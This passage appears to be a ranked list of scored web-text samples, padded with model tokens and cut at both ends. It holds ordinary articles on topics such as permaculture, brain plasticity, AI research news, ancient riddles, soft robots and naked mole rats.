+Maren tells FLPCI that the most valuable teachings from her permaculture education has been learning how much more possible it is to live in tune with nature. She says, + +Nature reveals patterns and systems that we can apply to use less energy in our approach to agriculture while providing more surplus. I also felt an emotional shift during the course as I slowed down my lifestyle to notice and feel just how wise, intelligent, and expressive nature is. I swelled with appreciation for the tiniest spider and the most magnificent, 200-year-old white pine tree. While I had never before studied agriculture or ecology, my FLPCI permaculture education has launched me into a world of curiosity about how I can more efficiently use resources in +================================================================================ +Rank = 55; Score = 630784.0 +<|begin_of_text|>Healthwise + +Columnist Larry R. Miller (Photo: Courtesy Photo) + +When the neural pathways in the brain became stronger, deeper ruts, we began to think, feel, act, and believe in automatic ways. When that's the case we begin to operate more and more within the boundaries of those ruts in your brain. Then we begin to feel, think, behave, respond and believe that we can’t change or that changing would be very difficult. You know those thoughts that course through your mind “Well, that’s the way I am. That’s who I am.” Once we believe that, we begin to look for more ways to solidify our convictions that we’re right about whatever we believe is true and that change isn’t possible. + +Anything you repeat over and over whether it's mind talk, something you practice or are repeatedly exposed to, the effects are the same, it causes a change in your brain. More neural pathways are made available for doing, thinking, believing, feeling or being “it”. The result is a new neural pathway is created for it. + +In the early days of brain plasticity research, monkeys were trained to push a lever over and over for many days. When the brains of the monkeys were looked at, researchers found that lots of neurons had been dedicated to lever-pushing. + +Most of our lives are spent in the beta brain wave state. The beta wave represents excitement of the cortex to a higher state of alertness and tension. This is a good place to be some of the time but not all the time. The alpha, theta, delta, and gamma brain waves are more resourceful brain wave patterns and meditation can help you become better at creating them. + +These brain wave states are involved in the most fundamental human ability-awareness. When you're in those states, you’re not just creating new neural pathways, new ruts, you’re creating super-awareness. Awareness, super awareness in particular, creates choice and when you're able to create choices, you can choose what you want to experience in life. + +Repeated meditation or other ways to enter these brain wave states allows for a is a huge increase in awareness, which allows you to see that you have choices about, and the ability to change, your automatic responses. And, as a result, you can choose to step out of the ruts that no longer are beneficial. Once these new patterns become the established norm, you’ll naturally choose to do, feel, think and be what's best for you to reach the goals you have set +================================================================================ +Rank = 56; Score = 622592.0 +<|begin_of_text|>Google is training its artificial intelligence machines to understand human behavior by using YouTube videos, the New York Post reported Tuesday. + +The Mountain View company has pulled more than 57,000 publicly available clips to highlight about 80 human actions like walking, kicking, hugging, and shaking hands. Called AVA, or "atomic visual actions," the videos are three second clips curated from YouTube and sourced from a "variety of genres and countries of origin." Some hail from popular films. + +"Despite exciting breakthroughs made over the past years in classifying and finding objects in images, recognizing human actions still remains a big challenge," Alphabet-owned Google wrote in an Oct. 19 blog post. "This is due to the fact that actions are, by nature, less well-defined than objects in videos." + +AI is driving huge changes at Google and CEO Sundar Pichai has put artificial intelligence at the forefront of nearly everything the company is doing. Google's new Pixel smartphones draws on Intel technology, and Rolls Royce recently announced a partnership with the site to create smarter, autonomous ships based on AI and machine learning and is the first agreement ever in the marine sector. + +Google is also working on creating self-driving cars to language recognition software.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 57; Score = 618496.0 +<|begin_of_text|>The joke that was old when Moses was around: Tablet full of crude gags and riddles about beer is found - dating back to Exodus + +Crude jokes, beer and a hearty disregard for politicians were part of life in ancient Mesopotamia - 3,500 years ago. + +A newly translated tablet from the area of present-day Iraq runs through a series of riddles which show that even in 1,500BC, people liked a puzzle. + +Modern audiences, though, should not expect to have their sides split - or indeed to solve any of the riddles, which are rather tricky (the riddles and their solutions are below). + +Cuneiform script as seen in a clay tablet, found at Tell-El-Amarna, Egypt: The location of the tablet of riddles is not known, and the study authors worked from a transcription from 1976. The museum it was in was looted during the 2003 Iraq war + +CAN YOU THINK LIKE A MESOPOTAMIAN? THE RIDDLES - AND THE ANSWERS + +'In your mouth and your teeth (or urine). Constantly stared at you. The measuring vessel of your lord. What is it?' Answer: Beer. 'The tower is high, but it has no shade.' + +Answer: Light. The riddle refers to a shaft of light hitting the ground. + +He gouged out the eye. It is not the fate of a dead man. He cut the throat: A dead man - who is it?' + +Answer: A governor - the joke here could be that a governor is portrayed as executioner. The two rudest riddles have missing answers - or ones that don't make sense. 'The deflowered girl did not become pregnant. The undeflowered girl became pregnant. What is it?' + +Answer: Auxiliary forces. The term for a group of soldiers is puzzling here, says Wasserman. + +'... of your mother, is by the one who has intercourse with her. Who is it?' + +Answer: Perhaps thankfully, this answer has been lost. + +Few riddles in the Akkadian language survive. + +It was commonly used by the ancient Babylonians and other civilisations around the area of present-day Iraq. + +The tablet dates to the time of the Biblical Exodus, and is thought to have been written near the Persian Gulf. + +It was written in cuneiform script. + +The text has large parts missing, and also appears to have been carved by an inexperienced scribe. + +The text was translated by Michael Streck of the University +================================================================================ +Rank = 58; Score = 614400.0 +<|begin_of_text|>No film in recent years has had quite as much input from the field of psychology as Disney and Pixar’s latest offering, Inside Out. Charming though the film is, its portrayal of emotional life tells us a lot about how current psychological theories treat the study of emotions. This gives us an excuse to contrast these ideas with the somewhat more intricate and careful theories Freud and Lacan developed on the subject. + +Inside Out centres on Riley, an 11 year old girl who moves with her parents from Minnesota to San Francisco, an event which precipitates the emotional convulsions the film chronicles. The central premise is that Riley’s feelings can themselves feel. Every time an emotional experience is registered, a memory orb drops into the internal world, called Headquarters. Memory orbs affect the personified emotions – Joy, Anger, Disgust, Fear, and Sadness – characters which march on and compete with each other to take charge of the control panel in Headquarters which determines how Riley reacts. + +What is an emotion? Psychologists involved in the making of Inside Out speak with great confidence about the nature of emotions. Their commentaries explaining the psychology supporting the film are peppered with phrases such as “We know…”, “Scientific studies find…”, and “The truth is…”. These are followed by quite bold claims which should demand some caution unless we are sure we know what we mean when we refer to emotional experience. + +Here is one such claim, from two psychologists involved as consultants on the film: + +“Riley’s personality is principally defined by Joy, and this is fitting with what we know scientifically. Studies find that our identities are defined by specific emotions, which shape how we perceive the world, how we express ourselves and the responses we evoke in others.” (source) + +So, our emotions are the basis for our identity and our experiences will be determined by them, or at least by those that “principally define” us. This model puts a lot of explanatory weight on emotions so it is worthwhile to start by questioning what an emotion actually is. Most fundamentally, is it so easy to identify an emotion like joy, sadness, or anger as a distinct, separate thing? + +Freud and Lacan’s ideas about emotions are rich and complex. For Freud, emotions are compounds: they can be transformed, combined, or displaced. What we feel is very often the result of this process of distortion which produces a disconnect between the emotion we feel and the idea we associate with it. For instance, we may be angry at person A and produce a +================================================================================ +Rank = 59; Score = 614400.0 +<|begin_of_text|>I know this is not everyone’s dish of tea William Weld, former Massachusetts governor, uttered this one on MSNBC’s Morning Joe, when he introduced the topic of climate change. This is a mashup of “not one’s cup of tea” (not one’s preference) and maybe “dish it out” (to dispense something, often verbally)? Or was the speaker just thinking of “cup and saucer” and got the two confused? No one knows except Mr. Weld, and perhaps he doesn’t either. On that note, I think I’ll have a “disha”. A big thanks to two people who heard this one and sent it in almost simultaneously: David Stephens and Donna Calvert. Thanks David and Donna! Advertisements + +They would jump on a bullet for him This was uttered when discussing the blind loyalty of Trump supporters. It is a congruent conflation of “take a bullet for (someone)” and “falling (or jumping) on a grenade for (someone)”, both meaning to accept a personally harmful or sacrificial task to protect someone else. Jumping on a bullet doesn’t seem like a great sacrifice to me, so perhaps this speaker was not such a loyal follower. A big thanks to John Kooser for hearing this one. + +The Manafort situation throws the whole incentive system on its head Columbia Law School professor Berit Berger uttered this one on the MSNBC show “The 11th Hour with Brian Williams”. She was discussing the pardon system and the Manafort case. This is a mashup of “turn (something) on its head” (to alter something in an unexpected way) and “throw it out the window” (forgotten, disregarded). “Turning” and “throwing” seems to have caused the mixup here. A big thanks to Frank King for hearing this one. + +Is it “Defend On Your Own” night? The contributor says her husband says this when she doesn’t feel like cooking for dinner. The malaphor prompts a visual of the family opening the refrigerator and fighting for the best leftovers. This is a mashup of “stand on one’s (own) two feet” (act independently) and “fend for (oneself)” (take care of oneself without the assistance of others). I suppose the speaker was thinking of the word “fend” but uttered “defend” instead. A tip of the hat to Lori Snider for sending this one in! + +My hackles were ruffled This was overheard at a nearby table at +================================================================================ +Rank = 60; Score = 610304.0 +<|begin_of_text|>Johannes Eisele/AFP/Getty Images + +There’s something not quite right about humanoid robots. They are cute up to a point, but once they become a bit too realistic, they often start to creep us out – a foible called the uncanny valley. Now Facebook wants robots to climb their way out of it. + +Researchers at Facebook’s AI lab have developed an expressive bot, an animation controlled by an artificially intelligent algorithm. The algorithm was trained on hundreds of videos of Skype conversations, so that it could learn and then mimic how humans adjust their expressions in response to each other. In tests, it successfully passed as human-like. + +What will happen when computers get access to your emotions? Find out in our expert talk at New Scientist Live + +To optimise its learning, the algorithm divided the human face into 68 key points that it monitored throughout each Skype conversation. People naturally produce nods, blinks and various mouth movements to show they are engaged with the person they are talking to, and eventually the system learned to do this too. + +Advertisement + +The bot was then able to look at a video of a human speaking, and choose in real time what the most appropriate facial response would be. If the person was laughing, for example, the bot might choose to open its mouth too, or tilt its head. + +The Facebook team then tested the system with panels of people who watched animations that included both the bot reacting to a human, and a human reacting to a human. The volunteers judged the bot and the human to be equally natural and realistic. + +However, as the animations were quite basic, it’s not clear whether a humanoid robot powered by this algorithm would have natural-seeming reactions. + +Additionally, learning the basic rules of facial communication might not be enough to create truly realistic conversation partners, says Goren Gordon at Tel Aviv University in Israel. “Actual facial expressions are based on what you are thinking and feeling.” + +In this case, the Facebook system ends up creating a kind of “average personality”, says Louis-Philippe Morency at Carnegie Mellon University in Pittsburgh. In future, more sophisticated bots might be able to pick from a range of personalities or adapt their own to match the person they are talking to. + +Robots aren’t so good at mastering these subtle elements of human interaction, says Gordon. We already know that humans prefer speaking with robots that mimic their own facial expression, he says, but now Facebook is trying to take robot conversations to the next level. “At some point we’ll get out of the uncanny valley and come out +================================================================================ +Rank = 61; Score = 606208.0 +<|begin_of_text|>Academics from the Future of Humanity Institute (FHI), part of the Oxford Martin School, are teaming up with Google DeepMind to make artificial intelligence safer. + +Stuart Armstrong, Alexander Tamas Fellow in Artificial Intelligence and Machine Learning at FHI, and Laurent Orseau of Google DeepMind, will present their research on reinforcement learning agent interruptibility at the UAI 2016 conference in New York City later this month. + +Armstrong and Orseau’s research explores a method to ensure that reinforcement learning agents can be safely interrupted repeatedly by human or automatic overseers. This ensures that the agents do not “learn” about the interruptions, and do not take steps to avoid or manipulate the interruptions. + +Interruptibility has several advantages as an approach over previous methods of control. As Dr Armstrong explains, “Interruptibility has applications for many current agents, especially when we need the agent not to learn from specific experiences during training. Many of the naïve ideas for accomplishing this - such as deleting certain histories from the training set - change the behaviour of the agent in unfortunate ways.” + +In the paper, the researchers provide a formal definition of safe interruptibility, show that some types of agents already have this property, and show that others can be easily modified to gain it. They also demonstrate that even an ideal agent that tends to the optimal behaviour in any computable environment can be made safely interruptible. + +Dr Armstrong continued: “Machine learning is one of the most powerful tools for building AI that has ever existed. But applying it to questions of AI motivation is problematic: just as we humans would not willingly change to an alien system of values, any agent has a natural tendency to avoid changing its current values, even if we want to change or tune them. + +"Interruptibility, and the related general idea of corrigibility, allow such changes to happen without the agent trying to resist them or force them. The newness of the field of AI safety means that there is relatively little awareness of these problems in the wider machine learning community. As with other areas of AI research, DeepMind remains at the cutting edge of this important subfield.”<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 62; Score = 606208.0 +<|begin_of_text|>UPDATE (11/29/12): Snippet of “Tell Me What They Mad For” below. The provided lyrics don’t match, though… + +Pusha T always speaks his mind, whether subliminally or directly (he detailed to HHW how his “New God Flow” verse was about Birdman)). The G.O.O.D. Music rapper, and one half of the Clipse, fires more shots at Lil Wayne and Birdman in a verse from a new Ludacris record called “Tell Me What They Mad For.” + +DaJaz1 posted a snippet of the track, but it appears to have since been removed. However, Push A Ton’s bars from the song, which also features Swizz Beatz, have been transcribed. Although he doesn’t name any names, it’s obvious who he is rapping. + +With your baby mama f-cking every rapper in the business Ni–as saying you was better when the drugs was in your system Now your crack swag gone ever since u came from prison Got you tweeting all stupid, is you skatin’, is you dissin’ Found out your Ghost leased and your Phantom just rented Won’t leave it in your name like Pac when he went missing Makaveli lives on so I’m riding on you b-tches. + +Damn. + +Since Ludacris has had issues with Big Sean and Drake, the finished product, which will appear on his forthcoming Ludaversal album, should be full of shots. We just hope if Weezy does respond in kind, it will be better than “Goulish.” + +MORE ON HIP-HOP WIRED! + +• 5 Reasons Why Rihanna Is Happiest With Chris Brown In Her Life [PHOTOS] + +• Pump It Up: 10 Rap Songs That Accidentally Turned Into Sports Anthems + +• 8 Things You Need To Know About Wiz Khalifa’s O.N.I.F.C. + +• Guitar Hero: 10 Interesting Facts About Jimi Hendrix [PHOTOS] + +• Katt Williams Leads Officers On A Chase In A Can Am Motorcycle [PHOTOS] + +• 11 Things We Learned From Nicki Minaj’s My Truth [PHOTOS] + +• Lil Wayne, Kanye West, Diddy, Scott Disick & More Celebrate DJ Khaled’s Birthday In LIV Nightclub [PHOTOS] + +• Beyoncé Shares New Shots Of Blue Ivy, Jay-Z [PHOTOS] + +— + +Photo: Pusha T<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 63; Score = 602112.0 +<|begin_of_text|>Researchers Jose Cordova of Yale University and Erich Astudillo of Chile’s Universidad de Santiago discovered a molecule they call Keep 32 that kills the bacteria responsible for all the trauma you suffered as a child, lying down blinded by the light as a masked man poked bits of metal in your mouth. Sometimes you don’t feel anything. Sometimes you feel funny. + +We all know how it works: Teeth + candy – brushing = cavities. The bacteria Streptococcus mutans metabolizes the sugar, turning it into lactic acid that slowly but surely dissolves the tooth enamel. The Keep 32 molecule kills this bacteria, thus helping you keep all 32 of your teeth in perfect shape. So, how is this better than fluoride? Well, for one, fluoride works by strengthening the tooth enamel, not killing the bacteria – it treats the symptoms and not the cause. Keep 32 goes directly to the cause of your grief. + +The patent-pending molecule appears to be quite versatile, and can reportedly be added into mouthwash, toothpaste, gum, candy and even proper food. Cordova and Astudillo are currently in talks to obtain funding for their trials, and if they succeed, we can expect dentally beneficial candy in 18 months. Considering how much money this can potentially make some people, I’m sure there won’t be a problem. + +But for now, I shall keep my joy in check, because it will all come to naught if the Keep 32 candy don’t taste like candy. + +(via Geek.com) + +Relevant to your interests<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 64; Score = 598016.0 +<|begin_of_text|>This story appears in the May 2017 issue of National Geographic magazine. + +Banish your preconceptions of robots as stiff, herky-jerky metal machines. An “octobot” less than three inches wide is changing the robotics landscape. + +The octobot is the world’s first completely soft, autonomous, and untethered robot. It is free of wires, batteries, and any hard material—like its namesake, the octopus, which has no internal skeleton. + +A Harvard University research team led by engineering professors Robert Wood and Jennifer Lewis tried more than 300 designs before they came up with one that worked. And now the octobot could revolutionize the use of robots. Traditional robots are “fantastic for what they do in terms of automation, but they’re not geared toward human interaction,” Wood says. Soft robots provide a safer solution: “If they run into something, it’d be like bumping into a basketball. It won’t hurt you.” + +Before the octobot, soft robots were either hybrids—pliable exteriors with hard guts of batteries or wires—or soft models tethered to an external cord. The octobot eliminates these restrictions. It moves by pneumatic power: An internal circuit triggers chemical reactions, turning its liquid hydrogen peroxide fuel into a gas, which inflates the robot’s limbs and allows them to move. The whole assembly is created from silicone using a 3-D printer. + +The octobot is currently a prototype, but its writhing arms prove that the technology works. The goal, says Wood, is to find viable applications, such as in health care. Soft robots could be made from biocompatible and biodegradable materials—and, he says, might even be formed into capsules to be swallowed for more effective and less invasive endoscopies.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 65; Score = 593920.0 +<|begin_of_text|>According to reports today, a sex doll called “Samantha” – on display at Linz’s Arts Electronica Festival – was so severely "molested" by a group of men, it was sent home in desperate need of repair and "badly soiled". Despite the damage, the owner claimed the robot was designed to take a lot and would "pull through". + +The attack on Samantha is deeply disturbing. It’s a blatant example of the violence that can happen when we tell men they can do whatever they want to an object designed to resemble a woman’s body. + +There will be some who argue that this "attack" proves the need for sex robots as an outlet for male aggression. However, rather than shrugging our shoulders and accepting that male sexual violence is inevitable, we must instead challenge the causes and try to end it. + +The argument that sex robots reduce male sexual violence by giving men an outlet is deeply flawed. Firstly, it is not backed up in evidence – partly because the robots are too new to allow for proper research. But secondly, and perhaps most importantly, sex robots make male violence seem more normal, more acceptable and, indeed, inevitable. How? Because these robots are specifically designed to eroticise non-consent. + +A sex robot cannot give consent — it can only take whatever its owner throws at it. As a result, it not only invites abusive treatment, it demands it. The brands behind the robots explicitly encourage the owners to act out sexual entitlement and aggression on these plastic bodies, allowing for men to associate the sexual pleasure of their orgasm with non-consent. Why else would True Companions dolls have a “frigid Farrah” setting that encourages the owner to simulate rape? + +Two main causes lie behind sexual violence – male entitlement and power. These are both re-enforced by sex robots, and instead desperately need to be challenged if we can ever hope to end male violence against women and girls. + +Sex robots not only don’t challenge male entitlement to women’s bodies, they entrench it. Even the term “owner” for the buyer of the robot implies this. It sends a message that men can “own” a sex object which is designed for them to do whatever they like with. The owners are entitled to act out whatever fantasy they have on their doll. In the case of Samantha, this entitlement even gave the men a chance to break the robot’s fingers. + +Similarly, sexual violence is not about attraction or sexual desire, it is about power. After all, men don’t rape women +================================================================================ +Rank = 66; Score = 593920.0 +<|begin_of_text|>Brandon Vick/University of Rochester + +The same molecules that endow naked mole rats with springy, wrinkled skin also seem to prevent the homely rodents from contracting cancer. Research published on Nature's website today identifies a sugary cellular secretion that stops the spread of would-be tumours1. + +Naked mole rats (Heterocephalus glaber), which are more closely related to porcupines than rats, are freaks of nature. The short-sighted creatures spend their lives in subterranean colonies in the service of a single breeding queen — H. glaber is one of only two 'eusocial' mammals ever discovered. The rodent doesn’t feel the sting of acids or the burn of chilli peppers, and seems to be the only mammal that is unable to regulate its body temperature. + +However, the animal's longevity and impunity to cancer are the reason why biologist Andrei Seluanov keeps around 80 naked mole rats in a special facility near his lab at the University of Rochester in New York state. The rodents have been known to live for up to 32 years, and scientists have never seen one with cancer. Mice, by comparison, rarely live past the age of four and do often die of cancer. + +Nature Podcast Ewen Callaway spoke to Andrei Seluanov about his work on naked mole rats' resistance to cancer. You may need a more recent browser or to install the latest version of the Adobe Flash Plugin. + +In 2009, Seluanov’s team reported that the naked mole rat's fibroblasts (a cell type found in connective tissue) are sensitive to the presence of other cells, and in Petri dishes they grow less crowded than mouse fibroblasts do2. To the annoyance of his lab workers, the broth they used to nurture the cells often turned so viscous that it clogged the drains. + +“Our lab technician was unhappy because she needed to disassemble the system and clean all this gooey stuff,” Seluanov recalls. “I told my graduate student that we have to find out what the gooey substance is — it should be related to their cancer resistance. Of course, at that time it was just a wild guess.” + +Sticky situation + +The team soon discovered that the plumbing problem was the result of a sugar called hyaluronic acid (HA). Fibroblasts ooze HA and, along with collagen and other chemicals, it forms the extracellular matrix that gives tissues their shape and makes skin elastic. Naked mole rats, +================================================================================ +Rank = 67; Score = 589824.0 +<|begin_of_text|>At a 